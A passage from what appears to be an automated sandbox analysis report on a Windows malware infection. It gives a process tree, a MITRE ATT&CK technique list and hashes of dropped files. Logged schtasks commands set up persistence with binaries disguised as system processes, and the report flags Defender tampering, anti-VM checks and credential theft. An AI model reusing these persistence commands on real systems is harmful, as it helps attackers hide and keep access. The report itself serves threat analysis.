                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3308 -childID 1 -isForBrowser -prefsHandle 3180 -prefMapHandle 3176 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2c757ec-d731-4428-bc71-68937787db9a} 1828 "\\.\pipe\gecko-crash-server-pipe.1828" tab
                                                        8⤵
                                                          PID:1504
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3980 -childID 2 -isForBrowser -prefsHandle 3700 -prefMapHandle 3128 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {37cae306-446e-4c2c-9f94-89d6d6b4eca2} 1828 "\\.\pipe\gecko-crash-server-pipe.1828" tab
                                                          8⤵
                                                            PID:400
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4308 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4344 -prefMapHandle 4336 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a921728-c0c5-434c-b6db-e0e702a78128} 1828 "\\.\pipe\gecko-crash-server-pipe.1828" utility
                                                            8⤵
                                                            • Checks processor information in registry
                                                            PID:5664
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5336 -childID 3 -isForBrowser -prefsHandle 5456 -prefMapHandle 5056 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aabcd3c2-d54d-4852-817f-0f98c00d71e0} 1828 "\\.\pipe\gecko-crash-server-pipe.1828" tab
                                                            8⤵
                                                              PID:4020
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5668 -childID 4 -isForBrowser -prefsHandle 5756 -prefMapHandle 5752 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f6090087-94ea-4943-9536-586bffe93bf3} 1828 "\\.\pipe\gecko-crash-server-pipe.1828" tab
                                                              8⤵
                                                                PID:3628
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5888 -childID 5 -isForBrowser -prefsHandle 5968 -prefMapHandle 5964 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6ad331a9-49ee-4edd-8ed2-da90be5aeb11} 1828 "\\.\pipe\gecko-crash-server-pipe.1828" tab
                                                                8⤵
                                                                  PID:3700
                                                          • C:\Users\Admin\AppData\Local\Temp\1012038001\2da833ecf5.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1012038001\2da833ecf5.exe"
                                                            5⤵
                                                            • Modifies Windows Defender Real-time Protection settings
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Windows security modification
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4916
                                                          • C:\Users\Admin\AppData\Local\Temp\1012039001\85ac318fc5.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1012039001\85ac318fc5.exe"
                                                            5⤵
                                                            • Enumerates VirtualBox registry keys
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • System Location Discovery: System Language Discovery
                                                            PID:5220
                                                          • C:\Users\Admin\AppData\Local\Temp\1012040001\rhnew.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1012040001\rhnew.exe"
                                                            5⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • System Location Discovery: System Language Discovery
                                                            PID:5972
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5972 -s 1548
                                                              6⤵
                                                              • Program crash
                                                              PID:5196
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5972 -s 1348
                                                              6⤵
                                                              • Program crash
                                                              PID:6136
                                                          • C:\Users\Admin\AppData\Local\Temp\1012041001\basx.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1012041001\basx.exe"
                                                            5⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:60
                                                            • C:\Users\Admin\AppData\Local\Temp\is-14FLV.tmp\basx.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-14FLV.tmp\basx.tmp" /SL5="$C002C,3293907,54272,C:\Users\Admin\AppData\Local\Temp\1012041001\basx.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1604
                                                              • C:\Windows\SysWOW64\net.exe
                                                                "C:\Windows\system32\net.exe" pause powerful_player_1242
                                                                7⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2580
                                                                • C:\Windows\SysWOW64\net1.exe
                                                                  C:\Windows\system32\net1 pause powerful_player_1242
                                                                  8⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1412
                                                              • C:\Users\Admin\AppData\Local\Powerful Player 3.0.1.11\powerfulplayer3.exe
                                                                "C:\Users\Admin\AppData\Local\Powerful Player 3.0.1.11\powerfulplayer3.exe" -i
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2584
                                                  • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                    1⤵
                                                      PID:3592
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                      1⤵
                                                        PID:2192
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 216 -ip 216
                                                        1⤵
                                                          PID:1224
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 216 -ip 216
                                                          1⤵
                                                            PID:3888
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files\Microsoft Office\Updates\Apply\FilesInUse\D5CB943E-34B5-4AB4-9E81-6354A9C511C5\System.exe'" /f
                                                            1⤵
                                                            • Process spawned unexpected child process
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:1840
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Updates\Apply\FilesInUse\D5CB943E-34B5-4AB4-9E81-6354A9C511C5\System.exe'" /rl HIGHEST /f
                                                            1⤵
                                                            • Process spawned unexpected child process
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:2588
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office\Updates\Apply\FilesInUse\D5CB943E-34B5-4AB4-9E81-6354A9C511C5\System.exe'" /rl HIGHEST /f
                                                            1⤵
                                                            • Process spawned unexpected child process
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:2612
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Internet Explorer\taskhostw.exe'" /f
                                                            1⤵
                                                            • Process spawned unexpected child process
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:1744
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\taskhostw.exe'" /rl HIGHEST /f
                                                            1⤵
                                                            • Process spawned unexpected child process
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:4904
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Internet Explorer\taskhostw.exe'" /rl HIGHEST /f
                                                            1⤵
                                                            • Process spawned unexpected child process
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:4188
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files\Microsoft Office\PackageManifests\dllhost.exe'" /f
                                                            1⤵
                                                            • Process spawned unexpected child process
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:2624
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\PackageManifests\dllhost.exe'" /rl HIGHEST /f
                                                            1⤵
                                                            • Process spawned unexpected child process
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:4536
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office\PackageManifests\dllhost.exe'" /rl HIGHEST /f
                                                            1⤵
                                                            • Process spawned unexpected child process
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:2168
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Windows\CbsTemp\StartMenuExperienceHost.exe'" /f
                                                            1⤵
                                                            • Process spawned unexpected child process
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:1676
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\CbsTemp\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                            1⤵
                                                            • Process spawned unexpected child process
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:1136
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Windows\CbsTemp\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                            1⤵
                                                            • Process spawned unexpected child process
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:4344
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\MsContainer\RuntimeBroker.exe'" /f
                                                            1⤵
                                                            • Process spawned unexpected child process
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:4072
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\MsContainer\RuntimeBroker.exe'" /rl HIGHEST /f
                                                            1⤵
                                                            • Process spawned unexpected child process
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:5104
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\MsContainer\RuntimeBroker.exe'" /rl HIGHEST /f
                                                            1⤵
                                                            • Process spawned unexpected child process
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:3336
                                                          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                            C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                            1⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            PID:5324
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5972 -ip 5972
                                                            1⤵
                                                              PID:3232
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5972 -ip 5972
                                                              1⤵
                                                                PID:5276
                                                              • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                1⤵
                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                • Checks BIOS information in registry
                                                                • Executes dropped EXE
                                                                • Identifies Wine through registry keys
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                PID:3796

                                                              Network

                                                              MITRE ATT&CK Enterprise v15

                                                              Reconnaissance

                                                              Resource Development

                                                              Initial Access

                                                              Execution

                                                              Command and Scripting Interpreter

                                                              1
                                                              T1059

                                                              PowerShell

                                                              1
                                                              T1059.001

                                                              Scheduled Task/Job

                                                              1
                                                              T1053

                                                              Scheduled Task

                                                              1
                                                              T1053.005

                                                              Persistence

                                                              Boot or Logon Autostart Execution

                                                              1
                                                              T1547

                                                              Registry Run Keys / Startup Folder

                                                              1
                                                              T1547.001

                                                              Create or Modify System Process

                                                              1
                                                              T1543

                                                              Windows Service

                                                              1
                                                              T1543.003

                                                              Modify Authentication Process

                                                              1
                                                              T1556

                                                              Scheduled Task/Job

                                                              1
                                                              T1053

                                                              Scheduled Task

                                                              1
                                                              T1053.005

                                                              Privilege Escalation

                                                              Boot or Logon Autostart Execution

                                                              1
                                                              T1547

                                                              Registry Run Keys / Startup Folder

                                                              1
                                                              T1547.001

                                                              Create or Modify System Process

                                                              1
                                                              T1543

                                                              Windows Service

                                                              1
                                                              T1543.003

                                                              Scheduled Task/Job

                                                              1
                                                              T1053

                                                              Scheduled Task

                                                              1
                                                              T1053.005

                                                              Defense Evasion

                                                              Impair Defenses

                                                              2
                                                              T1562

                                                              Disable or Modify Tools

                                                              2
                                                              T1562.001

                                                              Modify Authentication Process

                                                              1
                                                              T1556

                                                              Modify Registry

                                                              3
                                                              T1112

                                                              Virtualization/Sandbox Evasion

                                                              3
                                                              T1497

                                                              Credential Access

                                                              Credentials from Password Stores

                                                              1
                                                              T1555

                                                              Credentials from Web Browsers

                                                              1
                                                              T1555.003

                                                              Modify Authentication Process

                                                              1
                                                              T1556

                                                              Steal Web Session Cookie

                                                              1
                                                              T1539

                                                              Unsecured Credentials

                                                              4
                                                              T1552

                                                              Credentials In Files

                                                              4
                                                              T1552.001

                                                              Discovery

                                                              Browser Information Discovery

                                                              1
                                                              T1217

                                                              Query Registry

                                                              9
                                                              T1012

                                                              System Information Discovery

                                                              5
                                                              T1082

                                                              System Location Discovery

                                                              1
                                                              T1614

                                                              System Language Discovery

                                                              1
                                                              T1614.001

                                                              Virtualization/Sandbox Evasion

                                                              3
                                                              T1497

                                                              Lateral Movement

                                                              Collection

                                                              Data from Local System

                                                              3
                                                              T1005

                                                              Command and Control

                                                              Web Service

                                                              1
                                                              T1102

                                                              Exfiltration

                                                              Impact

                                                              Replay Monitor

                                                              Loading Replay Monitor...

                                                              Downloads

                                                              • C:\MsContainer\chainportruntimeCrtMonitor.exe
                                                                Filesize

                                                                1.9MB

                                                                MD5

                                                                a961ffe1faeecf8ad553d4792052498c

                                                                SHA1

                                                                1a8da2a519ac6d60a3af0e7bef9d210bf9f00625

                                                                SHA256

                                                                bf7c89bb02a84441cbf8a99d90d58203325aeb848cea98a62dbe9a39bc61308f

                                                                SHA512

                                                                873bb592136978e3a6d514eb8dae204e96f42c36bed28a274ef84666a0fc4d82a4f4dad1119e3fa754c3e6e4eeae8ac4040dd1ba3e3f6d5d9881cf2177f96c81

                                                                Download Submit

                                                              • C:\MsContainer\iceJ1UmfnosxAG3hkAOO7zmCT1vAJ8icZlmWEOQE.vbe
                                                                Filesize

                                                                198B

                                                                MD5

                                                                abc047663f5a5163ff7447ee9b417fad

                                                                SHA1

                                                                1e65b28464025176b1df8a328dc123437d167b82

                                                                SHA256

                                                                741d7b538b1a9e4d1c0aa414cfd52704974005ccb1c15496f82d4acf21432a7f

                                                                SHA512

                                                                fab046f932c9c3ca7f836e1706975edb0c2daf65ce343c8964bec6ab97e877a9c06f5171b70118c39986585073255c7a5d362ef6439742cb0346edef09810dc0

                                                                Download Submit

                                                              • C:\MsContainer\zXrLq55h.bat
                                                                Filesize

                                                                92B

                                                                MD5

                                                                d937b4f89c4dea90f63c8943f4de7fbd

                                                                SHA1

                                                                a84575193a53072fb72ae7698320da6aac2076ad

                                                                SHA256

                                                                eac9177e30044818cfb3cd3ed442d93253f661b17b8352d2a001063e37ab54e2

                                                                SHA512

                                                                adf8d4a650e3b9ca50dd47a4cbf8a614b068a7ca6ca200d7dbec752c059b22fa37e5d6ae6fbb85ee50f6d00abfe9552b53bb1f99f0d9503f82509822dac213e9

                                                                Download Submit

                                                              • C:\ProgramData\mozglue.dll
                                                                Filesize

                                                                593KB

                                                                MD5

                                                                c8fd9be83bc728cc04beffafc2907fe9

                                                                SHA1

                                                                95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                SHA256

                                                                ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                SHA512

                                                                fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                Download Submit

                                                              • C:\ProgramData\nss3.dll
                                                                Filesize

                                                                2.0MB

                                                                MD5

                                                                1cc453cdf74f31e4d913ff9c10acdde2

                                                                SHA1

                                                                6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                SHA256

                                                                ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                SHA512

                                                                dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
                                                                Filesize

                                                                649B

                                                                MD5

                                                                1bef5b6e0c7f0270690c0533811f94c1

                                                                SHA1

                                                                2e9996bd14ed368312c7b95ba6cccf23938af91d

                                                                SHA256

                                                                ecb68ef8dd417a12e824f5c259d7ff1c3bdc8f18187fd922d0f6a6240ba625c3

                                                                SHA512

                                                                ed81dd79d6264700d76155dc02c72ff6b1540aac45e0cc9b593a07410655e360100d09efd831436c2257c61d58d2da9693358e81b87b7e9a111130a80ff29e7d

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\_locales\en_CA\messages.json
                                                                Filesize

                                                                851B

                                                                MD5

                                                                07ffbe5f24ca348723ff8c6c488abfb8

                                                                SHA1

                                                                6dc2851e39b2ee38f88cf5c35a90171dbea5b690

                                                                SHA256

                                                                6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

                                                                SHA512

                                                                7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\dasherSettingSchema.json
                                                                Filesize

                                                                854B

                                                                MD5

                                                                4ec1df2da46182103d2ffc3b92d20ca5

                                                                SHA1

                                                                fb9d1ba3710cf31a87165317c6edc110e98994ce

                                                                SHA256

                                                                6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

                                                                SHA512

                                                                939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
                                                                Filesize

                                                                2B

                                                                MD5

                                                                d751713988987e9331980363e24189ce

                                                                SHA1

                                                                97d170e1550eee4afc0af065b78cda302a97674c

                                                                SHA256

                                                                4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                SHA512

                                                                b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                Filesize

                                                                2KB

                                                                MD5

                                                                d85ba6ff808d9e5444a4b369f5bc2730

                                                                SHA1

                                                                31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                SHA256

                                                                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                SHA512

                                                                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                Filesize

                                                                152B

                                                                MD5

                                                                d22073dea53e79d9b824f27ac5e9813e

                                                                SHA1

                                                                6d8a7281241248431a1571e6ddc55798b01fa961

                                                                SHA256

                                                                86713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6

                                                                SHA512

                                                                97152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                Filesize

                                                                152B

                                                                MD5

                                                                bffcefacce25cd03f3d5c9446ddb903d

                                                                SHA1

                                                                8923f84aa86db316d2f5c122fe3874bbe26f3bab

                                                                SHA256

                                                                23e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405

                                                                SHA512

                                                                761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                Filesize

                                                                5KB

                                                                MD5

                                                                5fff5eb52d9dfda02edce11e3979e799

                                                                SHA1

                                                                8b0f0897cb632c6e70bbc2d34a4d15acb80a5af9

                                                                SHA256

                                                                ea75b48e322fb749c43624d490a082a273a23941e4fe2aa62bbe248a89649159

                                                                SHA512

                                                                bd3a88a72ec1ff1a1b92fe7bcbdb6509a78eb5a8f30b79afa941dabdc0fb85d144f3d7ca5ca5652e2d44effc668096e65c8cc46b8e5ba55ad7e486f06926fe8a

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\aa31fa21-d21f-438b-943d-de940ff6279f.tmp
                                                                Filesize

                                                                1B

                                                                MD5

                                                                5058f1af8388633f609cadb75a75dc9d

                                                                SHA1

                                                                3a52ce780950d4d969792a2559cd519d7ee8c727

                                                                SHA256

                                                                cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                                SHA512

                                                                0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\9MFSIIMR\download[1].htm
                                                                Filesize

                                                                1B

                                                                MD5

                                                                cfcd208495d565ef66e7dff9f98764da

                                                                SHA1

                                                                b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                                SHA256

                                                                5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                                SHA512

                                                                31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                Filesize

                                                                944B

                                                                MD5

                                                                2979eabc783eaca50de7be23dd4eafcf

                                                                SHA1

                                                                d709ce5f3a06b7958a67e20870bfd95b83cad2ea

                                                                SHA256

                                                                006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903

                                                                SHA512

                                                                92bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                Filesize

                                                                944B

                                                                MD5

                                                                d28a889fd956d5cb3accfbaf1143eb6f

                                                                SHA1

                                                                157ba54b365341f8ff06707d996b3635da8446f7

                                                                SHA256

                                                                21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                                                SHA512

                                                                0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                Filesize

                                                                944B

                                                                MD5

                                                                62623d22bd9e037191765d5083ce16a3

                                                                SHA1

                                                                4a07da6872672f715a4780513d95ed8ddeefd259

                                                                SHA256

                                                                95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

                                                                SHA512

                                                                9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lhmx4teg.default-release\activity-stream.discovery_stream.json
                                                                Filesize

                                                                19KB

                                                                MD5

                                                                ed3a5fad7cac778ecd5d633aaa30e6c7

                                                                SHA1

                                                                26cf06ba1c1ebb8e880fca676a01322b7bc04c33

                                                                SHA256

                                                                5daaf06b461b5d9df742ed4123cee13759e4914f820a677d838fb70e93b94cdb

                                                                SHA512

                                                                5831cf2207826266e6dc293e0e5ad6329dd45a8e4ed7cbbf269fef84eb5d49d8e23a4497061009da30f5c40c68109a99e906b82aa2ab813add84855fab76cd71

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lhmx4teg.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
                                                                Filesize

                                                                15KB

                                                                MD5

                                                                96c542dec016d9ec1ecc4dddfcbaac66

                                                                SHA1

                                                                6199f7648bb744efa58acf7b96fee85d938389e4

                                                                SHA256

                                                                7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                                                                SHA512

                                                                cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe
                                                                Filesize

                                                                1.8MB

                                                                MD5

                                                                5fa72774e9d750628857a68d84275833

                                                                SHA1

                                                                7eebff7d14817544cc11829e354c1dfc7f603628

                                                                SHA256

                                                                a170fa6fefc8b753ef0f88384b906ca2338365d8552012ed7aa1c0c8c7cb5a56

                                                                SHA512

                                                                9ac2715f35e107effef9f4526e6430271ca141bc5a729993e88dfa50eb20f61b15502c54f64e9596cd9bb449a1bb25c1cc98f1d12d857afdda742cdce3280838

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Temp\1011944001\4XYFk9r.exe
                                                                Filesize

                                                                5.6MB

                                                                MD5

                                                                20c1c110a69ba6dc9fb55a1186334290

                                                                SHA1

                                                                7b35f156d8ef02936af990349d35efd7146380f2

                                                                SHA256

                                                                7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29

                                                                SHA512

                                                                08eb3ff63e09c6d236ceac3c006c844c48f283c266e8b3fa25ec1ee04d2eca49ec4788534e1ee55749de5ad89ddfa0dbbafa4eb9f30f35cdd783da08a2ad5d10

                                                                Download Submit

                                                              • C:\Users\Admin\AppData\Local\Temp\1012026001\CxOJE6t.exe
                                                                Filesize

                                                                2.2MB

                                                                MD5

                                                                10f971c35d66a56bff28e89b8f97b849

                                                                SHA1

                                                                f504ffe66a8bf9725af6c5aed8cb0358dfc460b1

